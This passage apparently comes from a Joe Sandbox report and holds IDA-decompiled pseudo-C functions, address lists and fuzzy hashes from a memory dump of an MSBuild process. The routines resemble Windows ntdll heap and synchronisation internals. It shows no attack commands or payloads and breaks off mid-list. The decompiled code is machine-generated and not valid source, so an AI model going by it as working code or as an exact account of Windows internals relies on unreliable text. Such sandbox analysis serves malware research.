                                            						_t62 = _t52 & 0x000000ff;
                                            						_t59 = L01024620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                                            						if(_t59 == 0) {
                                            							_t37 = 0xc0000017;
                                            						} else {
                                            							_t56 = _v0;
                                            							 *(_t59 + 1) = _t52;
                                            							 *_t59 = 1;
                                            							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                                            							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                                            							_t44 = _t62 - 1;
                                            							if(_t44 <= 7) {
                                            								switch( *((intOrPtr*)(_t44 * 4 +  &M0103E810))) {
                                            									case 0:
                                            										L6:
                                            										 *((intOrPtr*)(_t59 + 8)) = _a8;
                                            										goto L7;
                                            									case 1:
                                            										L13:
                                            										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                                            										goto L6;
                                            									case 2:
                                            										L12:
                                            										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                                            										goto L13;
                                            									case 3:
                                            										L11:
                                            										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                                            										goto L12;
                                            									case 4:
                                            										L10:
                                            										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                                            										goto L11;
                                            									case 5:
                                            										L9:
                                            										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                                            										goto L10;
                                            									case 6:
                                            										L17:
                                            										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                                            										goto L9;
                                            									case 7:
                                            										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                                            										goto L17;
                                            								}
                                            							}
                                            							L7:
                                            							 *_a40 = _t59;
                                            							_t37 = 0;
                                            						}
                                            					}
                                            					return _t37;
                                            				} else {
                                            					_push(0x20);
                                            					asm("ror eax, cl");
                                            					return _a4 ^ _v8;
                                            				}
                                            			}

















                                            0x0103e730
                                            0x0103e736
                                            0x0103e738
                                            0x0103e73d
                                            0x0103e73e
                                            0x0103e740
                                            0x0103e749
                                            0x0103e765
                                            0x0103e76a
                                            0x0103e76b
                                            0x0103e76c
                                            0x0103e76d
                                            0x0103e76e
                                            0x0103e76f
                                            0x0103e775
                                            0x0103e777
                                            0x0103e77e
                                            0x0107b675
                                            0x0103e784
                                            0x0103e784
                                            0x0103e789
                                            0x0103e7a8
                                            0x0103e7ac
                                            0x0103e807
                                            0x0103e7ae
                                            0x0103e7ae
                                            0x0103e7b1
                                            0x0103e7b4
                                            0x0103e7b9
                                            0x0103e7c0
                                            0x0103e7c4
                                            0x0103e7ca
                                            0x0103e7cc
                                            0x00000000
                                            0x0103e7d3
                                            0x0103e7d6
                                            0x00000000
                                            0x00000000
                                            0x0103e7ff
                                            0x0103e802
                                            0x00000000
                                            0x00000000
                                            0x0103e7f9
                                            0x0103e7fc
                                            0x00000000
                                            0x00000000
                                            0x0103e7f3
                                            0x0103e7f6
                                            0x00000000
                                            0x00000000
                                            0x0103e7ed
                                            0x0103e7f0
                                            0x00000000
                                            0x00000000
                                            0x0103e7e7
                                            0x0103e7ea
                                            0x00000000
                                            0x00000000
                                            0x0107b685
                                            0x0107b688
                                            0x00000000
                                            0x00000000
                                            0x0107b682
                                            0x00000000
                                            0x00000000
                                            0x0103e7cc
                                            0x0103e7d9
                                            0x0103e7dc
                                            0x0103e7de
                                            0x0103e7de
                                            0x0103e7ac
                                            0x0103e7e4
                                            0x0103e74b
                                            0x0103e751
                                            0x0103e759
                                            0x0103e761
                                            0x0103e761

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d5527b10e35ca011b0d8815cb02c105334602dbbc412e07f3ddda1652666b378
                                            • Instruction ID: 5dec9ef31bc570900d8ddeb6cf394cc08f6c297555e2dde636eb0403e74b79ef
                                            • Opcode Fuzzy Hash: d5527b10e35ca011b0d8815cb02c105334602dbbc412e07f3ddda1652666b378
                                            • Instruction Fuzzy Hash: 0931A075A14249EFD745CF58C841F9ABBE8FB49314F1482A6FA48CB341D631EC80CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 67%
                                            			E0103BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                                            				intOrPtr _v8;
                                            				intOrPtr _v12;
                                            				void* __ebx;
                                            				void* __edi;
                                            				intOrPtr _t22;
                                            				intOrPtr* _t41;
                                            				intOrPtr _t51;
                                            
                                            				_t51 =  *0x10f6100; // 0x5
                                            				_v12 = __edx;
                                            				_v8 = __ecx;
                                            				if(_t51 >= 0x800) {
                                            					L12:
                                            					return 0;
                                            				} else {
                                            					goto L1;
                                            				}
                                            				while(1) {
                                            					L1:
                                            					_t22 = _t51;
                                            					asm("lock cmpxchg [ecx], edx");
                                            					if(_t51 == _t22) {
                                            						break;
                                            					}
                                            					_t51 = _t22;
                                            					if(_t22 < 0x800) {
                                            						continue;
                                            					}
                                            					goto L12;
                                            				}
                                            				E01022280(0xd, 0x54cf1a0);
                                            				_t41 =  *0x10f60f8; // 0x0
                                            				if(_t41 != 0) {
                                            					 *0x10f60f8 =  *_t41;
                                            					 *0x10f60fc =  *0x10f60fc + 0xffff;
                                            				}
                                            				E0101FFB0(_t41, 0x800, 0x54cf1a0);
                                            				if(_t41 != 0) {
                                            					L6:
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                                            					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                                            					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                                            					do {
                                            						asm("lock xadd [0x10f60f0], ax");
                                            						 *((short*)(_t41 + 0x34)) = 1;
                                            					} while (1 == 0);
                                            					goto L8;
                                            				} else {
                                            					_t41 = L01024620(0x10f6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                                            					if(_t41 == 0) {
                                            						L11:
                                            						asm("lock dec dword [0x10f6100]");
                                            						L8:
                                            						return _t41;
                                            					}
                                            					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                                            					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                                            					if(_t41 == 0) {
                                            						goto L11;
                                            					}
                                            					goto L6;
                                            				}
                                            			}










                                            0x0103bc36
                                            0x0103bc42
                                            0x0103bc45
                                            0x0103bc4a
                                            0x0103bd35
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0103bc50
                                            0x0103bc50
                                            0x0103bc58
                                            0x0103bc5a
                                            0x0103bc60
                                            0x00000000
                                            0x00000000
                                            0x0107a4f2
                                            0x0107a4f6
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0107a4fc
                                            0x0103bc79
                                            0x0103bc7e
                                            0x0103bc86
                                            0x0103bd16
                                            0x0103bd20
                                            0x0103bd20
                                            0x0103bc8d
                                            0x0103bc94
                                            0x0103bcbd
                                            0x0103bcca
                                            0x0103bccb
                                            0x0103bccc
                                            0x0103bccd
                                            0x0103bcce
                                            0x0103bcd4
                                            0x0103bcea
                                            0x0103bcee
                                            0x0103bcf2
                                            0x0103bd00
                                            0x0103bd04
                                            0x00000000
                                            0x0103bc96
                                            0x0103bcab
                                            0x0103bcaf
                                            0x0103bd2c
                                            0x0103bd2c
                                            0x0103bd09
                                            0x00000000
                                            0x0103bd09
                                            0x0103bcb1
                                            0x0103bcb5
                                            0x0103bcbb
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0103bcbb

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e86beb5c8e1767dcfba3e153fef63e725877e0b9a5084f216cc9e1c075251ff9
                                            • Instruction ID: 663afde0b075f9ff762823b5d5378a95a65f49ae61fc2efb820f1e8035f14373
                                            • Opcode Fuzzy Hash: e86beb5c8e1767dcfba3e153fef63e725877e0b9a5084f216cc9e1c075251ff9
                                            • Instruction Fuzzy Hash: A3313636A006169FCB61EF58C4817AA73B8FF98314F140079EDC8DB205E77AD945CB81
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 76%
                                            			E01009100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                                            				signed int _t53;
                                            				signed int _t56;
                                            				signed int* _t60;
                                            				signed int _t63;
                                            				signed int _t66;
                                            				signed int _t69;
                                            				void* _t70;
                                            				intOrPtr* _t72;
                                            				void* _t78;
                                            				void* _t79;
                                            				signed int _t80;
                                            				intOrPtr _t82;
                                            				void* _t85;
                                            				void* _t88;
                                            				void* _t89;
                                            
                                            				_t84 = __esi;
                                            				_t70 = __ecx;
                                            				_t68 = __ebx;
                                            				_push(0x2c);
                                            				_push(0x10df6e8);
                                            				E0105D0E8(__ebx, __edi, __esi);
                                            				 *((char*)(_t85 - 0x1d)) = 0;
                                            				_t82 =  *((intOrPtr*)(_t85 + 8));
                                            				if(_t82 == 0) {
                                            					L4:
                                            					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                                            						E010D88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                                            					}
                                            					L5:
                                            					return E0105D130(_t68, _t82, _t84);
                                            				}
                                            				_t88 = _t82 -  *0x10f86c0; // 0xac07b0
                                            				if(_t88 == 0) {
                                            					goto L4;
                                            				}
                                            				_t89 = _t82 -  *0x10f86b8; // 0x0
                                            				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                            					goto L4;
                                            				} else {
                                            					E01022280(_t82 + 0xe0, _t82 + 0xe0);
                                            					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                                            					__eflags =  *((char*)(_t82 + 0xe5));
                                            					if(__eflags != 0) {
                                            						E010D88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                                            						goto L12;
                                            					} else {
                                            						__eflags =  *((char*)(_t82 + 0xe4));
                                            						if( *((char*)(_t82 + 0xe4)) == 0) {
                                            							 *((char*)(_t82 + 0xe4)) = 1;
                                            							_push(_t82);
                                            							_push( *((intOrPtr*)(_t82 + 0x24)));
                                            							E0104AFD0();
                                            						}
                                            						while(1) {
                                            							_t60 = _t82 + 8;
                                            							 *(_t85 - 0x2c) = _t60;
                                            							_t68 =  *_t60;
                                            							_t80 = _t60[1];
                                            							 *(_t85 - 0x28) = _t68;
                                            							 *(_t85 - 0x24) = _t80;
                                            							while(1) {
                                            								L10:
                                            								__eflags = _t80;
                                            								if(_t80 == 0) {
                                            									break;
                                            								}
                                            								_t84 = _t68;
                                            								 *(_t85 - 0x30) = _t80;
                                            								 *(_t85 - 0x24) = _t80 - 1;
                                            								asm("lock cmpxchg8b [edi]");
                                            								_t68 = _t84;
                                            								 *(_t85 - 0x28) = _t68;
                                            								 *(_t85 - 0x24) = _t80;
                                            								__eflags = _t68 - _t84;
                                            								_t82 =  *((intOrPtr*)(_t85 + 8));
                                            								if(_t68 != _t84) {
                                            									continue;
                                            								}
                                            								__eflags = _t80 -  *(_t85 - 0x30);
                                            								if(_t80 !=  *(_t85 - 0x30)) {
                                            									continue;
                                            								}
                                            								__eflags = _t80;
                                            								if(_t80 == 0) {
                                            									break;
                                            								}
                                            								_t63 = 0;
                                            								 *(_t85 - 0x34) = 0;
                                            								_t84 = 0;
                                            								__eflags = 0;
                                            								while(1) {
                                            									 *(_t85 - 0x3c) = _t84;
                                            									__eflags = _t84 - 3;
                                            									if(_t84 >= 3) {
                                            										break;
                                            									}
                                            									__eflags = _t63;
                                            									if(_t63 != 0) {
                                            										L40:
                                            										_t84 =  *_t63;
                                            										__eflags = _t84;
                                            										if(_t84 != 0) {
                                            											_t84 =  *(_t84 + 4);
                                            											__eflags = _t84;
                                            											if(_t84 != 0) {
                                            												 *0x10fb1e0(_t63, _t82);
                                            												 *_t84();
                                            											}
                                            										}
                                            										do {
                                            											_t60 = _t82 + 8;
                                            											 *(_t85 - 0x2c) = _t60;
                                            											_t68 =  *_t60;
                                            											_t80 = _t60[1];
                                            											 *(_t85 - 0x28) = _t68;
                                            											 *(_t85 - 0x24) = _t80;
                                            											goto L10;
                                            										} while (_t63 == 0);
                                            										goto L40;
                                            									}
                                            									_t69 = 0;
                                            									__eflags = 0;
                                            									while(1) {
                                            										 *(_t85 - 0x38) = _t69;
                                            										__eflags = _t69 -  *0x10f84c0;
                                            										if(_t69 >=  *0x10f84c0) {
                                            											break;
                                            										}
                                            										__eflags = _t63;
                                            										if(_t63 != 0) {
                                            											break;
                                            										}
                                            										_t66 = E010D9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                                            										__eflags = _t66;
                                            										if(_t66 == 0) {
                                            											_t63 = 0;
                                            											__eflags = 0;
                                            										} else {
                                            											_t63 = _t66 + 0xfffffff4;
                                            										}
                                            										 *(_t85 - 0x34) = _t63;
                                            										_t69 = _t69 + 1;
                                            									}
                                            									_t84 = _t84 + 1;
                                            								}
                                            								__eflags = _t63;
                                            							}
                                            							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                                            							 *((char*)(_t82 + 0xe5)) = 1;
                                            							 *((char*)(_t85 - 0x1d)) = 1;
                                            							L12:
                                            							 *(_t85 - 4) = 0xfffffffe;
                                            							E0100922A(_t82);
                                            							_t53 = E01027D50();
                                            							__eflags = _t53;
                                            							if(_t53 != 0) {
                                            								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            							} else {
                                            								_t56 = 0x7ffe0386;
                                            							}
                                            							__eflags =  *_t56;
                                            							if( *_t56 != 0) {
                                            								_t56 = E010D8B58(_t82);
                                            							}
                                            							__eflags =  *((char*)(_t85 - 0x1d));
                                            							if( *((char*)(_t85 - 0x1d)) != 0) {
                                            								__eflags = _t82 -  *0x10f86c0; // 0xac07b0
                                            								if(__eflags != 0) {
                                            									__eflags = _t82 -  *0x10f86b8; // 0x0
                                            									if(__eflags == 0) {
                                            										_t79 = 0x10f86bc;
                                            										_t72 = 0x10f86b8;
                                            										goto L18;
                                            									}
                                            									__eflags = _t56 | 0xffffffff;
                                            									asm("lock xadd [edi], eax");
                                            									if(__eflags == 0) {
                                            										E01009240(_t68, _t82, _t82, _t84, __eflags);
                                            									}
                                            								} else {
                                            									_t79 = 0x10f86c4;
                                            									_t72 = 0x10f86c0;
                                            									L18:
                                            									E01039B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                                            								}
                                            							}
                                            							goto L5;
                                            						}
                                            					}
                                            				}
                                            			}


















                                            0x01009100
                                            0x01009100
                                            0x01009100
                                            0x01009100
                                            0x01009102
                                            0x01009107
                                            0x0100910c
                                            0x01009110
                                            0x01009115
                                            0x01009136
                                            0x01009143
                                            0x010637e4
                                            0x010637e4
                                            0x01009149
                                            0x0100914e
                                            0x0100914e
                                            0x01009117
                                            0x0100911d
                                            0x00000000
                                            0x00000000
                                            0x0100911f
                                            0x01009125
                                            0x00000000
                                            0x01009151
                                            0x01009158
                                            0x0100915d
                                            0x01009161
                                            0x01009168
                                            0x01063715
                                            0x00000000
                                            0x0100916e
                                            0x0100916e
                                            0x01009175
                                            0x01009177
                                            0x0100917e
                                            0x0100917f
                                            0x01009182
                                            0x01009182
                                            0x01009187
                                            0x01009187
                                            0x0100918a
                                            0x0100918d
                                            0x0100918f
                                            0x01009192
                                            0x01009195
                                            0x01009198
                                            0x01009198
                                            0x01009198
                                            0x0100919a
                                            0x00000000
                                            0x00000000
                                            0x0106371f
                                            0x01063721
                                            0x01063727
                                            0x0106372f
                                            0x01063733
                                            0x01063735
                                            0x01063738
                                            0x0106373b
                                            0x0106373d
                                            0x01063740
                                            0x00000000
                                            0x00000000
                                            0x01063746
                                            0x01063749
                                            0x00000000
                                            0x00000000
                                            0x0106374f
                                            0x01063751
                                            0x00000000
                                            0x00000000
                                            0x01063757
                                            0x01063759
                                            0x0106375c
                                            0x0106375c
                                            0x0106375e
                                            0x0106375e
                                            0x01063761
                                            0x01063764
                                            0x00000000
                                            0x00000000
                                            0x01063766
                                            0x01063768
                                            0x010637a3
                                            0x010637a3
                                            0x010637a5
                                            0x010637a7
                                            0x010637ad
                                            0x010637b0
                                            0x010637b2
                                            0x010637bc
                                            0x010637c2
                                            0x010637c2
                                            0x010637b2
                                            0x01009187
                                            0x01009187
                                            0x0100918a
                                            0x0100918d
                                            0x0100918f
                                            0x01009192
                                            0x01009195
                                            0x00000000
                                            0x01009195
                                            0x00000000
                                            0x01009187
                                            0x0106376a
                                            0x0106376a
                                            0x0106376c
                                            0x0106376c
                                            0x0106376f
                                            0x01063775
                                            0x00000000
                                            0x00000000
                                            0x01063777
                                            0x01063779
                                            0x00000000
                                            0x00000000
                                            0x01063782
                                            0x01063787
                                            0x01063789
                                            0x01063790
                                            0x01063790
                                            0x0106378b
                                            0x0106378b
                                            0x0106378b
                                            0x01063792
                                            0x01063795
                                            0x01063795
                                            0x01063798
                                            0x01063798
                                            0x0106379b
                                            0x0106379b
                                            0x010091a3
                                            0x010091a9
                                            0x010091b0
                                            0x010091b4
                                            0x010091b4
                                            0x010091bb
                                            0x010091c0
                                            0x010091c5
                                            0x010091c7
                                            0x010637da
                                            0x010091cd
                                            0x010091cd
                                            0x010091cd
                                            0x010091d2
                                            0x010091d5
                                            0x01009239
                                            0x01009239
                                            0x010091d7
                                            0x010091db
                                            0x010091e1
                                            0x010091e7
                                            0x010091fd
                                            0x01009203
                                            0x0100921e
                                            0x01009223
                                            0x00000000
                                            0x01009223
                                            0x01009205
                                            0x01009208
                                            0x0100920c
                                            0x01009214
                                            0x01009214
                                            0x010091e9
                                            0x010091e9
                                            0x010091ee
                                            0x010091f3
                                            0x010091f3
                                            0x010091f3
                                            0x010091e7
                                            0x00000000
                                            0x010091db
                                            0x01009187
                                            0x01009168

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 882b10093bda95735195df4737ed23bf0272862bc3555aa92c06452a6eacd0db
                                            • Instruction ID: 7213900b4d23c382c5ee90bc700e26bb682691cf2b0a6cdd69c609bc112a58f1
                                            • Opcode Fuzzy Hash: 882b10093bda95735195df4737ed23bf0272862bc3555aa92c06452a6eacd0db
                                            • Instruction Fuzzy Hash: E431A075B01245DFEB62DB6CC0887DDBBF1BB89318F18819EC58867282C335A980CB51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 60%
                                            			E01031DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                            				char _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr* _v20;
                                            				void* _t22;
                                            				char _t23;
                                            				void* _t36;
                                            				intOrPtr _t42;
                                            				intOrPtr _t43;
                                            
                                            				_v12 = __ecx;
                                            				_t43 = 0;
                                            				_v20 = __edx;
                                            				_t42 =  *__edx;
                                            				 *__edx = 0;
                                            				_v16 = _t42;
                                            				_push( &_v8);
                                            				_push(0);
                                            				_push(0);
                                            				_push(6);
                                            				_push(0);
                                            				_push(__ecx);
                                            				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
                                            				_push(_t36);
                                            				_t22 = E0102F460();
                                            				if(_t22 < 0) {
                                            					if(_t22 == 0xc0000023) {
                                            						goto L1;
                                            					}
                                            					L3:
                                            					return _t43;
                                            				}
                                            				L1:
                                            				_t23 = _v8;
                                            				if(_t23 != 0) {
                                            					_t38 = _a4;
                                            					if(_t23 >  *_a4) {
                                            						_t42 = L01024620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
                                            						if(_t42 == 0) {
                                            							goto L3;
                                            						}
                                            						_t23 = _v8;
                                            					}
                                            					_push( &_v8);
                                            					_push(_t23);
                                            					_push(_t42);
                                            					_push(6);
                                            					_push(_t43);
                                            					_push(_v12);
                                            					_push(_t36);
                                            					if(E0102F460() < 0) {
                                            						if(_t42 != 0 && _t42 != _v16) {
                                            							L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
                                            						}
                                            						goto L3;
                                            					}
                                            					 *_v20 = _t42;
                                            					 *_a4 = _v8;
                                            				}
                                            				_t43 = 1;
                                            				goto L3;
                                            			}












                                            0x01031dc2
                                            0x01031dc5
                                            0x01031dc7
                                            0x01031dcc
                                            0x01031dce
                                            0x01031dd6
                                            0x01031ddf
                                            0x01031de0
                                            0x01031de1
                                            0x01031de5
                                            0x01031de8
                                            0x01031def
                                            0x01031df0
                                            0x01031df6
                                            0x01031df7
                                            0x01031dfe
                                            0x01031e1a
                                            0x00000000
                                            0x00000000
                                            0x01031e0b
                                            0x01031e12
                                            0x01031e12
                                            0x01031e00
                                            0x01031e00
                                            0x01031e05
                                            0x01031e1e
                                            0x01031e23
                                            0x0107570f
                                            0x01075713
                                            0x00000000
                                            0x00000000
                                            0x01075719
                                            0x01075719
                                            0x01031e2c
                                            0x01031e2d
                                            0x01031e2e
                                            0x01031e2f
                                            0x01031e31
                                            0x01031e32
                                            0x01031e35
                                            0x01031e3d
                                            0x01075723
                                            0x0107573d
                                            0x0107573d
                                            0x00000000
                                            0x01075723
                                            0x01031e49
                                            0x01031e4e
                                            0x01031e4e
                                            0x01031e09
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                            • Instruction ID: 3501284a06afa20488a25eb62913912b2465cb794d53015887723ebccdcca341
                                            • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                            • Instruction Fuzzy Hash: 8B217F72A00119FBD721CF59CC80EAABBBDEF89780F114095EA8597210D675AE01CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 53%
                                            			E01020050(void* __ecx) {
                                            				signed int _v8;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				intOrPtr* _t30;
                                            				intOrPtr* _t31;
                                            				signed int _t34;
                                            				void* _t40;
                                            				void* _t41;
                                            				signed int _t44;
                                            				intOrPtr _t47;
                                            				signed int _t58;
                                            				void* _t59;
                                            				void* _t61;
                                            				void* _t62;
                                            				signed int _t64;
                                            
                                            				_push(__ecx);
                                            				_v8 =  *0x10fd360 ^ _t64;
                                            				_t61 = __ecx;
                                            				_t2 = _t61 + 0x20; // 0x20
                                            				E01039ED0(_t2, 1, 0);
                                            				_t52 =  *(_t61 + 0x8c);
                                            				_t4 = _t61 + 0x8c; // 0x8c
                                            				_t40 = _t4;
                                            				do {
                                            					_t44 = _t52;
                                            					_t58 = _t52 & 0x00000001;
                                            					_t24 = _t44;
                                            					asm("lock cmpxchg [ebx], edx");
                                            					_t52 = _t44;
                                            				} while (_t52 != _t44);
                                            				if(_t58 == 0) {
                                            					L7:
                                            					_pop(_t59);
                                            					_pop(_t62);
                                            					_pop(_t41);
                                            					return E0104B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                                            				}
                                            				asm("lock xadd [esi], eax");
                                            				_t47 =  *[fs:0x18];
                                            				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                                            				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                                            				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                            				if(_t30 != 0) {
                                            					if( *_t30 == 0) {
                                            						goto L4;
                                            					}
                                            					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            					L5:
                                            					if( *_t31 != 0) {
                                            						_t18 = _t61 + 0x78; // 0x78
                                            						E010D8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                                            					}
                                            					_t52 =  *(_t61 + 0x5c);
                                            					_t11 = _t61 + 0x78; // 0x78
                                            					_t34 = E01039702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                                            					_t24 = _t34 | 0xffffffff;
                                            					asm("lock xadd [esi], eax");
                                            					if((_t34 | 0xffffffff) == 0) {
                                            						 *0x10fb1e0(_t61);
                                            						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                                            					}
                                            					goto L7;
                                            				}
                                            				L4:
                                            				_t31 = 0x7ffe0386;
                                            				goto L5;
                                            			}




















                                            0x01020055
                                            0x0102005d
                                            0x01020062
                                            0x0102006c
                                            0x0102006f
                                            0x01020074
                                            0x0102007a
                                            0x0102007a
                                            0x01020080
                                            0x01020080
                                            0x01020087
                                            0x0102008d
                                            0x0102008f
                                            0x01020093
                                            0x01020095
                                            0x0102009b
                                            0x010200f8
                                            0x010200fb
                                            0x010200fc
                                            0x010200ff
                                            0x01020108
                                            0x01020108
                                            0x010200a2
                                            0x010200a6
                                            0x010200b3
                                            0x010200bc
                                            0x010200c5
                                            0x010200ca
                                            0x0106c01e
                                            0x00000000
                                            0x00000000
                                            0x0106c02d
                                            0x010200d5
                                            0x010200d9
                                            0x0106c03d
                                            0x0106c046
                                            0x0106c046
                                            0x010200df
                                            0x010200e2
                                            0x010200ea
                                            0x010200ef
                                            0x010200f2
                                            0x010200f6
                                            0x01020111
                                            0x01020117
                                            0x01020117
                                            0x00000000
                                            0x010200f6
                                            0x010200d0
                                            0x010200d0
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 88a2178a0f90c65a2f993bbec6c1051073211fe10702ee5d994bf2f56c1f891f
                                            • Instruction ID: e0a6a8ad695ac65140a1af099c54862184d38c15bf636a88dcc81509ff06cd33
                                            • Opcode Fuzzy Hash: 88a2178a0f90c65a2f993bbec6c1051073211fe10702ee5d994bf2f56c1f891f
                                            • Instruction Fuzzy Hash: 0231AE31201B05CFE762CB28C884B9AB3E5FF88714F1485ADF5D687B94EB75A801CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 77%
                                            			E01086C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
                                            				signed short* _v8;
                                            				signed char _v12;
                                            				void* _t22;
                                            				signed char* _t23;
                                            				intOrPtr _t24;
                                            				signed short* _t44;
                                            				void* _t47;
                                            				signed char* _t56;
                                            				signed char* _t58;
                                            
                                            				_t48 = __ecx;
                                            				_push(__ecx);
                                            				_push(__ecx);
                                            				_t44 = __ecx;
                                            				_v12 = __edx;
                                            				_v8 = __ecx;
                                            				_t22 = E01027D50();
                                            				_t58 = 0x7ffe0384;
                                            				if(_t22 == 0) {
                                            					_t23 = 0x7ffe0384;
                                            				} else {
                                            					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                            				}
                                            				if( *_t23 != 0) {
                                            					_t24 =  *0x10f7b9c; // 0x0
                                            					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
                                            					_t23 = L01024620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
                                            					_t56 = _t23;
                                            					if(_t56 != 0) {
                                            						_t56[0x24] = _a4;
                                            						_t56[0x28] = _a8;
                                            						_t56[6] = 0x1420;
                                            						_t56[0x20] = _v12;
                                            						_t14 =  &(_t56[0x2c]); // 0x2c
                                            						E0104F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
                                            						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
                                            						if(E01027D50() != 0) {
                                            							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                            						}
                                            						_push(_t56);
                                            						_push(_t47 - 0x20);
                                            						_push(0x402);
                                            						_push( *_t58 & 0x000000ff);
                                            						E01049AE0();
                                            						_t23 = L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
                                            					}
                                            				}
                                            				return _t23;
                                            			}












                                            0x01086c0a
                                            0x01086c0f
                                            0x01086c10
                                            0x01086c13
                                            0x01086c15
                                            0x01086c19
                                            0x01086c1c
